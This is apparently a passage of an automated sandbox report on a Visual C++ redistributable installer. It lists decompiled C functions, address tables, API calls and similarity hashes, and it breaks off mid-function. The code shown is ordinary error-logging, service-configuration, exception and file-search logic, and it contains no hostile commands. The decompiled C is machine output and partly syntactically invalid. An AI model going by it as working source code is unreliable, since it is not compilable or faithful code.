                                                                          0x0004bb76
                                                                          0x0004bb76
                                                                          0x0004bb7b
                                                                          0x0004bb7e
                                                                          0x0004bb82
                                                                          0x0004bb82
                                                                          0x0004bb83
                                                                          0x0004bb85
                                                                          0x0004bb8b
                                                                          0x0004bb91
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004bb91
                                                                          0x0004bac4
                                                                          0x0004bb97
                                                                          0x0004bb97
                                                                          0x00000000
                                                                          0x0004bb97
                                                                          0x0004a91c
                                                                          0x0004a913
                                                                          0x0004a90a
                                                                          0x0004a8c1
                                                                          0x0004a8c5
                                                                          0x0004a8cd
                                                                          0x00000000
                                                                          0x0004a8cf
                                                                          0x0004a8d5
                                                                          0x0004a8da
                                                                          0x0004bbb6
                                                                          0x0004bbb6
                                                                          0x0004bbb9
                                                                          0x0004bbc4
                                                                          0x0004bbef
                                                                          0x0004bbf0
                                                                          0x0004bbf1
                                                                          0x0004bbf2
                                                                          0x0004bbf3
                                                                          0x0004bbf4
                                                                          0x0004bbf9
                                                                          0x0004bbfc
                                                                          0x0004bbff
                                                                          0x0004bc00
                                                                          0x0004bc03
                                                                          0x0004bc05
                                                                          0x0004bc0b
                                                                          0x0004bc0e
                                                                          0x0004bc10
                                                                          0x0004bc25
                                                                          0x0004bc26
                                                                          0x0004bc29
                                                                          0x0004bc2b
                                                                          0x0004bc41
                                                                          0x0004bc47
                                                                          0x0004bc4f
                                                                          0x0004bc51
                                                                          0x0004bc5c
                                                                          0x0004bc5f
                                                                          0x0004bc76
                                                                          0x0004bc61
                                                                          0x0004bc61
                                                                          0x0004bc66
                                                                          0x00000000
                                                                          0x0004bc66
                                                                          0x0004bc53
                                                                          0x0004bc53
                                                                          0x0004bc58
                                                                          0x0004bc68
                                                                          0x0004bc68
                                                                          0x0004bc69
                                                                          0x0004bc6b
                                                                          0x0004bc70
                                                                          0x0004bc70
                                                                          0x0004bc2d
                                                                          0x0004bc2d
                                                                          0x0004bc30
                                                                          0x00000000
                                                                          0x0004bc32
                                                                          0x0004bc35
                                                                          0x0004bc3d
                                                                          0x0004bc3d
                                                                          0x0004bc30
                                                                          0x0004bc12
                                                                          0x0004bc12
                                                                          0x0004bc19
                                                                          0x0004bc1a
                                                                          0x0004bc1c
                                                                          0x0004bc21
                                                                          0x0004bc21
                                                                          0x0004bc07
                                                                          0x0004bc07
                                                                          0x0004bc07
                                                                          0x0004bc7a
                                                                          0x0004bbc6
                                                                          0x0004bbc6
                                                                          0x0004bbc6
                                                                          0x0004bbcd
                                                                          0x0004bbce
                                                                          0x0004bbcf
                                                                          0x0004bbd0
                                                                          0x0004bbd9
                                                                          0x0004bbde
                                                                          0x0004bbec
                                                                          0x0004bbec
                                                                          0x0004bbc4
                                                                          0x0004a8cd

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: __floor_pentium4
                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                          • API String ID: 4168288129-2761157908
                                                                          • Opcode ID: b70070ec48cb169b02f10bbd60054fbf0a334b89d25e576c69d4c9071adfef01
                                                                          • Instruction ID: 11b64fb8df3c4d7de89f7a5e8a39336cefc13da8db6abacf9f2517c9dd929a56
                                                                          • Opcode Fuzzy Hash: b70070ec48cb169b02f10bbd60054fbf0a334b89d25e576c69d4c9071adfef01
                                                                          • Instruction Fuzzy Hash: D2C24AB1E086288FDB65CE28DD407EAB3F9EB45305F1441EAD80DE7241E778AE818F45
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0004FD20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 59windowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0004FD20(void* __ecx, void* __edi, intOrPtr _a4, void* _a8, long _a12, char* _a16, intOrPtr _a20) {
				short _v8;
				short _t25;
				signed int _t32;
				void* _t33;
				void* _t34;
				void* _t36;
				long _t38;

				_t36 = __edi;
				_t38 = 0;
				_v8 = 0;
				_t32 = FormatMessageW(0x900, _a8, _a12, 0,  &_v8, 0,  &_a16);
				if(_t32 != 0) {
					if(_t32 < 2) {
						goto L7;
					} else {
						_t25 = _v8;
						_t33 = 0xd;
						if(_t33 ==  *((intOrPtr*)(_t25 + _t32 * 2 - 4))) {
							_t34 = 0xa;
							if(_t34 ==  *((intOrPtr*)(_t25 + _t32 * 2 - 2))) {
								 *((short*)(_t25 + _t32 * 2 - 4)) = 0;
								goto L7;
							}
						}
					}
					goto L8;
				} else {
					_t38 =  <=  ? GetLastError() : _t29 & 0x0000ffff | 0x80070000;
					if(_t38 >= 0) {
						L7:
						_t25 = _v8;
						L8:
						E0004FDC2(_t36, _a4, _a12, _t25, _a20);
					} else {
						E000137D3(_t29, "logutil.cpp", 0x333, _t38);
					}
				}
				if(_v8 != 0) {
					LocalFree(_v8);
				}
				return _t38;
			}










                                                                          0x0004fd20
                                                                          0x0004fd28
                                                                          0x0004fd2f
                                                                          0x0004fd45
                                                                          0x0004fd49
                                                                          0x0004fd78
                                                                          0x00000000
                                                                          0x0004fd7a
                                                                          0x0004fd7a
                                                                          0x0004fd7f
                                                                          0x0004fd85
                                                                          0x0004fd89
                                                                          0x0004fd8f
                                                                          0x0004fd93
                                                                          0x00000000
                                                                          0x0004fd93
                                                                          0x0004fd8f
                                                                          0x0004fd85
                                                                          0x00000000
                                                                          0x0004fd4b
                                                                          0x0004fd5c
                                                                          0x0004fd61
                                                                          0x0004fd98
                                                                          0x0004fd98
                                                                          0x0004fd9b
                                                                          0x0004fda5
                                                                          0x0004fd63
                                                                          0x0004fd6e
                                                                          0x0004fd6e
                                                                          0x0004fd61
                                                                          0x0004fdae
                                                                          0x0004fdb3
                                                                          0x0004fdb3
                                                                          0x0004fdbf

                                                                          APIs
                                                                          • FormatMessageW.KERNEL32(00000900,?,00000000,00000000,00000000,00000000,?,00000000,?,?,000503EC,?,00000000,?,?,00000001), ref: 0004FD3F
                                                                          • GetLastError.KERNEL32(?,000503EC,?,00000000,?,?,00000001,?,00015523,?,?,00000000,?,?,0001528D,00000002), ref: 0004FD4B
                                                                          • LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,000503EC,?,00000000,?,?,00000001,?,00015523,?,?), ref: 0004FDB3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFormatFreeLastLocalMessage
                                                                          • String ID: @Met$logutil.cpp
                                                                          • API String ID: 1365068426-637279948
                                                                          • Opcode ID: 113efc08d15925e5641fb05c13f435eb881e728ea4b617fbead8955eb766dda5
                                                                          • Instruction ID: 51fe58c2d27ce8a1a0ebfca9c71bc9bae979b56cf1ffc17bc12a11971c4bbff9
                                                                          • Opcode Fuzzy Hash: 113efc08d15925e5641fb05c13f435eb881e728ea4b617fbead8955eb766dda5
                                                                          • Instruction Fuzzy Hash: C5118FB1A0021AABDB21AF90CD05EFF7BAAEF54711F014039FD0596160D7719A60D7A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00036945 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 47%
                                                                          			E00036945(void* _a4, int _a8) {
				short* _t11;

				_t11 = 0;
				if(ChangeServiceConfigW(_a4, 0xffffffff, _a8, 0xffffffff, 0, 0, 0, 0, 0, 0, 0) == 0) {
					_t14 =  <=  ? GetLastError() : _t5 & 0x0000ffff | 0x80070000;
					_t11 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t5 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "msuengine.cpp", 0x1ec, _t11);
					_push("Failed to set service start type.");
					_push(_t11);
					E0005012F();
				}
				return _t11;
			}




                                                                          0x00036949
                                                                          0x00036964
                                                                          0x00036977
                                                                          0x00036981
                                                                          0x0003698f
                                                                          0x00036994
                                                                          0x00036999
                                                                          0x0003699a
                                                                          0x000369a0
                                                                          0x000369a5

                                                                          APIs
                                                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000368EF,00000000,00000003), ref: 0003695C
                                                                          • GetLastError.KERNEL32(?,000368EF,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,00036CE1,?), ref: 00036966
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ChangeConfigErrorLastService
                                                                          • String ID: @Met$Failed to set service start type.$msuuser.cpp
                                                                          • API String ID: 1456623077-404797364
                                                                          • Opcode ID: 0d5e69378b3b09b6eb3ab460e98f40b65f4ad3de358555eba922567fa11218f2
                                                                          • Instruction ID: b5d9b5165a89f4fe3ecbbd418f5b6886272b658234d07297bf7092a401a60caa
                                                                          • Opcode Fuzzy Hash: 0d5e69378b3b09b6eb3ab460e98f40b65f4ad3de358555eba922567fa11218f2
                                                                          • Instruction Fuzzy Hash: 8EF0E532B0833037AB2026AA9C09FDB7ECCDF017B1F114326FD28E61D1DA258C0082E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00043BB0 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 86%
                                                                          			E00043BB0(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				void* __ebp;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x7a008; // 0xfbf51acb
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E0003E7C0(_t41);
					_pop(_t62);
				}
				E0003F670(_t67,  &_v804, 0, 0x50);
				E0003F670(_t67,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x80004009
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // 0x80003cdd
				if(UnhandledExceptionFilter(_t36) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E0003E7C0(_t57);
				}
				return E0003DE36(_t61, _v8 ^ _t70, _t66, _t68, _t69);
			}







































                                                                          0x00043bb0
                                                                          0x00043bb0
                                                                          0x00043bb0
                                                                          0x00043bbb
                                                                          0x00043bc0
                                                                          0x00043bc2
                                                                          0x00043bca
                                                                          0x00043bcc
                                                                          0x00043bcf
                                                                          0x00043bd4
                                                                          0x00043bd4
                                                                          0x00043be0
                                                                          0x00043bf3
                                                                          0x00043c01
                                                                          0x00043c07
                                                                          0x00043c0d
                                                                          0x00043c13
                                                                          0x00043c19
                                                                          0x00043c1f
                                                                          0x00043c25
                                                                          0x00043c2b
                                                                          0x00043c31
                                                                          0x00043c37
                                                                          0x00043c3e
                                                                          0x00043c45
                                                                          0x00043c4c
                                                                          0x00043c53
                                                                          0x00043c5a
                                                                          0x00043c61
                                                                          0x00043c62
                                                                          0x00043c6b
                                                                          0x00043c71
                                                                          0x00043c71
                                                                          0x00043c74
                                                                          0x00043c7a
                                                                          0x00043c87
                                                                          0x00043c90
                                                                          0x00043c99
                                                                          0x00043ca2
                                                                          0x00043cb0
                                                                          0x00043cb2
                                                                          0x00043cb8
                                                                          0x00043cc7
                                                                          0x00043cd3
                                                                          0x00043cd6
                                                                          0x00043cdb
                                                                          0x00043cea

                                                                          APIs
                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00043CA8
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00043CB2
                                                                          • UnhandledExceptionFilter.KERNEL32(80003CDD,?,?,?,?,?,?), ref: 00043CBF
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                          • String ID:
                                                                          • API String ID: 3906539128-0
                                                                          • Opcode ID: 800142a682924ff000c28ef916ee4356a4675ea33ad6b6bb9f11dc228f02ac30
                                                                          • Instruction ID: a28bc5922cec0b6fe50a4f0a0a9776bf847ae76d08c3317a2b3364f2f183cf1c
                                                                          • Opcode Fuzzy Hash: 800142a682924ff000c28ef916ee4356a4675ea33ad6b6bb9f11dc228f02ac30
                                                                          • Instruction Fuzzy Hash: C631B375901218ABCB61DF64D9897DDBBB8AF08310F5042EAE40CA7261E7349B858F54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00047A87 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 74%
                                                                          			E00047A87(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v28;
				signed int _v32;
				WCHAR* _v36;
				signed int _v48;
				intOrPtr _v556;
				intOrPtr _v558;
				struct _WIN32_FIND_DATAW _v604;
				intOrPtr* _v608;
				signed int _v612;
				signed int _v616;
				intOrPtr _v644;
				intOrPtr _v648;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t40;
				signed int _t45;
				signed int _t48;
				signed int _t50;
				signed int _t51;
				signed char _t53;
				signed int _t62;
				void* _t64;
				union _FINDEX_INFO_LEVELS _t66;
				signed int _t71;
				intOrPtr* _t72;
				signed int _t75;
				void* _t82;
				void* _t84;
				signed int _t85;
				void* _t89;
				WCHAR* _t90;
				void* _t91;
				intOrPtr* _t94;
				intOrPtr _t97;
				void* _t99;
				signed int _t100;
				intOrPtr* _t104;
				signed int _t107;
				void* _t110;
				signed int _t113;
				void* _t114;
				union _FINDEX_INFO_LEVELS _t115;
				void* _t116;
				void* _t119;
				void* _t120;
				void* _t121;
				signed int _t122;
				void* _t123;
				void* _t124;
				signed int _t128;
				void* _t129;
				signed int _t130;
				void* _t131;
				void* _t132;

				_push(__ecx);
				_t94 = _a4;
				_t2 = _t94 + 2; // 0x2
				_t110 = _t2;
				do {
					_t40 =  *_t94;
					_t94 = _t94 + 2;
				} while (_t40 != 0);
				_t113 = _a12;
				_t97 = (_t94 - _t110 >> 1) + 1;
				_v8 = _t97;
				if(_t97 <= (_t40 | 0xffffffff) - _t113) {
					_t5 = _t113 + 1; // 0x1
					_t89 = _t5 + _t97;
					_t120 = E0004523F(_t97, _t89, 2);
					_t99 = _t119;
					__eflags = _t113;
					if(_t113 == 0) {
						L6:
						_push(_v8);
						_t89 = _t89 - _t113;
						_t45 = E00047897(_t99, _t120 + _t113 * 2, _t89, _a4);
						_t130 = _t129 + 0x10;
						__eflags = _t45;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t82 = E00047D00(_a16, _t110, __eflags, _t120);
							E0004511A(0);
							_t84 = _t82;
							goto L8;
						}
					} else {
						_push(_t113);
						_t85 = E00047897(_t99, _t120, _t89, _a8);
						_t130 = _t129 + 0x10;
						__eflags = _t85;
						if(_t85 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00043D8A();
							asm("int3");
							_t128 = _t130;
							_t131 = _t130 - 0x260;
							_t48 =  *0x7a008; // 0xfbf51acb
							_v48 = _t48 ^ _t128;
							_t111 = _v28;
							_t100 = _v32;
							_push(_t89);
							_t90 = _v36;
							_push(_t120);
							_push(_t113);
							_t121 = 0x5c;
							_v644 = _t111;
							_v648 = 0x2f;
							_t114 = 0x3a;
							while(1) {
								__eflags = _t100 - _t90;
								if(_t100 == _t90) {
									break;
								}
								_t50 =  *_t100 & 0x0000ffff;
								__eflags = _t50 - _v612;
								if(_t50 != _v612) {
									__eflags = _t50 - _t121;
									if(_t50 != _t121) {
										__eflags = _t50 - _t114;
										if(_t50 != _t114) {
											_t100 = _t100 - 2;
											__eflags = _t100;
											continue;
										}
									}
								}
								break;
							}
							_t122 =  *_t100 & 0x0000ffff;
							__eflags = _t122 - _t114;
							if(_t122 != _t114) {
								L19:
								_t51 = _t122;
								_t115 = 0;
								_t111 = 0x2f;
								__eflags = _t51 - _t111;
								if(_t51 == _t111) {
									L23:
									_t53 = 1;
									__eflags = 1;
								} else {
									_t111 = 0x5c;
									__eflags = _t51 - _t111;
									if(_t51 == _t111) {
										goto L23;
									} else {
										_t111 = 0x3a;
										__eflags = _t51 - _t111;
										if(_t51 == _t111) {
											goto L23;
										} else {
											_t53 = 0;
										}
									}
								}
								_t103 = (_t100 - _t90 >> 1) + 1;
								asm("sbb eax, eax");
								_v612 =  ~(_t53 & 0x000000ff) & (_t100 - _t90 >> 0x00000001) + 0x00000001;
								E0003F670(_t115,  &_v604, _t115, 0x250);
								_t132 = _t131 + 0xc;
								_t123 = FindFirstFileExW(_t90, _t115,  &_v604, _t115, _t115, _t115);
								__eflags = _t123 - 0xffffffff;
								if(_t123 != 0xffffffff) {
									_t104 = _v608;
									_t62 =  *((intOrPtr*)(_t104 + 4)) -  *_t104;
									__eflags = _t62;
									_v616 = _t62 >> 2;
									_t64 = 0x2e;
									do {
										__eflags = _v604.cFileName - _t64;
										if(_v604.cFileName != _t64) {
											L36:
											_push(_t104);
											_t66 = E00047A87(_t104,  &(_v604.cFileName), _t90, _v612);
											_t132 = _t132 + 0x10;
											__eflags = _t66;
											if(_t66 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											__eflags = _v558 - _t115;
											if(_v558 == _t115) {
												goto L37;
											} else {
												__eflags = _v558 - _t64;
												if(_v558 != _t64) {
													goto L36;
												} else {
													__eflags = _v556 - _t115;
													if(_v556 == _t115) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t71 = FindNextFileW(_t123,  &_v604);
										_t104 = _v608;
										__eflags = _t71;
										_t64 = 0x2e;
									} while (_t71 != 0);
									_t72 = _t104;
									_t107 = _v616;
									_t111 =  *_t72;
									_t75 =  *((intOrPtr*)(_t72 + 4)) -  *_t72 >> 2;
									__eflags = _t107 - _t75;
									if(_t107 != _t75) {
										E0004BFE0(_t90, _t111 + _t107 * 4, _t75 - _t107, 4, E000478A2);
									}
								} else {
									_push(_v608);
									_t66 = E00047A87(_t103, _t90, _t115, _t115);
									L26:
									_t115 = _t66;
								}
								__eflags = _t123 - 0xffffffff;
								if(_t123 != 0xffffffff) {
									FindClose(_t123);
								}
							} else {
								__eflags = _t100 -  &(_t90[1]);
								if(_t100 ==  &(_t90[1])) {
									goto L19;
								} else {
									_push(_t111);
									E00047A87(_t100, _t90, 0, 0);
								}
							}
							_pop(_t116);
							_pop(_t124);
							__eflags = _v12 ^ _t128;
							_pop(_t91);
							return E0003DE36(_t91, _v12 ^ _t128, _t111, _t116, _t124);
						} else {
							goto L6;
						}
					}
				} else {
					_t84 = 0xc;
					L8:
					return _t84;
				}
				L40:
			}





























































                                                                          0x00047a8c
                                                                          0x00047a8d
                                                                          0x00047a94
                                                                          0x00047a94
                                                                          0x00047a97
                                                                          0x00047a97
                                                                          0x00047a9a
                                                                          0x00047a9d
                                                                          0x00047aa2
                                                                          0x00047aac
                                                                          0x00047aaf
                                                                          0x00047ab4
                                                                          0x00047abc
                                                                          0x00047abf
                                                                          0x00047ac9
                                                                          0x00047acc
                                                                          0x00047acd
                                                                          0x00047acf
                                                                          0x00047ae3
                                                                          0x00047ae3
                                                                          0x00047ae6
                                                                          0x00047af0
                                                                          0x00047af5
                                                                          0x00047af8
                                                                          0x00047afa
                                                                          0x00000000
                                                                          0x00047afc
                                                                          0x00047b00
                                                                          0x00047b09
                                                                          0x00047b0f
                                                                          0x00000000
                                                                          0x00047b11
                                                                          0x00047ad1
                                                                          0x00047ad1
                                                                          0x00047ad7
                                                                          0x00047adc
                                                                          0x00047adf
                                                                          0x00047ae1
                                                                          0x00047b18
                                                                          0x00047b1a
                                                                          0x00047b1b
                                                                          0x00047b1c
                                                                          0x00047b1d
                                                                          0x00047b1e
                                                                          0x00047b1f
                                                                          0x00047b24
                                                                          0x00047b28
                                                                          0x00047b2a
                                                                          0x00047b30
                                                                          0x00047b37
                                                                          0x00047b3a
                                                                          0x00047b3d
                                                                          0x00047b40
                                                                          0x00047b41
                                                                          0x00047b44
                                                                          0x00047b45
                                                                          0x00047b48
                                                                          0x00047b4b
                                                                          0x00047b51
                                                                          0x00047b5b
                                                                          0x00047b77
                                                                          0x00047b77
                                                                          0x00047b79
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00047b5e
                                                                          0x00047b61
                                                                          0x00047b68
                                                                          0x00047b6a
                                                                          0x00047b6d
                                                                          0x00047b6f
                                                                          0x00047b72
                                                                          0x00047b74
                                                                          0x00047b74
                                                                          0x00000000
                                                                          0x00047b74
                                                                          0x00047b72
                                                                          0x00047b6d
                                                                          0x00000000
                                                                          0x00047b68
                                                                          0x00047b7b
                                                                          0x00047b7e
                                                                          0x00047b81
                                                                          0x00047b9d
                                                                          0x00047b9f
                                                                          0x00047ba1
                                                                          0x00047ba3
                                                                          0x00047ba4
                                                                          0x00047ba7
                                                                          0x00047bbd
                                                                          0x00047bbf
                                                                          0x00047bbf
                                                                          0x00047ba9
                                                                          0x00047bab
                                                                          0x00047bac
                                                                          0x00047baf
                                                                          0x00000000
                                                                          0x00047bb1
                                                                          0x00047bb3
                                                                          0x00047bb4
                                                                          0x00047bb7
                                                                          0x00000000
                                                                          0x00047bb9
                                                                          0x00047bb9
                                                                          0x00047bb9
                                                                          0x00047bb7
                                                                          0x00047baf
                                                                          0x00047bc7
                                                                          0x00047bcf
                                                                          0x00047bd3
                                                                          0x00047be1
                                                                          0x00047be6
                                                                          0x00047bfb
                                                                          0x00047bfd
                                                                          0x00047c00
                                                                          0x00047c35
                                                                          0x00047c40
                                                                          0x00047c40
                                                                          0x00047c45
                                                                          0x00047c4b
                                                                          0x00047c4c
                                                                          0x00047c4c
                                                                          0x00047c53
                                                                          0x00047c70
                                                                          0x00047c70
                                                                          0x00047c7f
                                                                          0x00047c84
                                                                          0x00047c87
                                                                          0x00047c89
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00047c55
                                                                          0x00047c55
                                                                          0x00047c5c
                                                                          0x00000000
                                                                          0x00047c5e
                                                                          0x00047c5e
                                                                          0x00047c65
                                                                          0x00000000
                                                                          0x00047c67
                                                                          0x00047c67
                                                                          0x00047c6e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00047c6e
                                                                          0x00047c65
                                                                          0x00047c5c
                                                                          0x00000000
                                                                          0x00047c8b
                                                                          0x00047c93
                                                                          0x00047c99
                                                                          0x00047c9f
                                                                          0x00047ca3
                                                                          0x00047ca3
                                                                          0x00047ca6
                                                                          0x00047ca8
                                                                          0x00047cae
                                                                          0x00047cb5
                                                                          0x00047cb8
                                                                          0x00047cba
                                                                          0x00047cce
                                                                          0x00047cd3
                                                                          0x00047c02
                                                                          0x00047c08
                                                                          0x00047c0c
                                                                          0x00047c14
                                                                          0x00047c14
                                                                          0x00047c14
                                                                          0x00047c16
                                                                          0x00047c19
                                                                          0x00047c1c
                                                                          0x00047c1c
                                                                          0x00047b83
                                                                          0x00047b86
                                                                          0x00047b88
                                                                          0x00000000
                                                                          0x00047b8a
                                                                          0x00047b8a
                                                                          0x00047b90
                                                                          0x00047b95
                                                                          0x00047b88
                                                                          0x00047c27
                                                                          0x00047c28
                                                                          0x00047c29
                                                                          0x00047c2b
                                                                          0x00047c34
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00047ae1
                                                                          0x00047ab6
                                                                          0x00047ab8
                                                                          0x00047b12
                                                                          0x00047b17
                                                                          0x00047b17
                                                                          0x00000000

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: /
                                                                          • API String ID: 0-2043925204
                                                                          • Opcode ID: 5ba612371c22fb1021647f6afa877450b5f0ca7d87e2f0fae113a87421daed04
                                                                          • Instruction ID: 6671bdc4f9bba2cf2c03f3e5173488b91a43cb645c2d1d1cf095bf124580a6ce
                                                                          • Opcode Fuzzy Hash: 5ba612371c22fb1021647f6afa877450b5f0ca7d87e2f0fae113a87421daed04
                                                                          • Instruction Fuzzy Hash: 384118B29002196ACB249FB9DC89EBB77B8EB80314F504579F91997181E7309E81CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0004A3B0 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODECrypto
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 90%
                                                                          			E0004A3B0(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
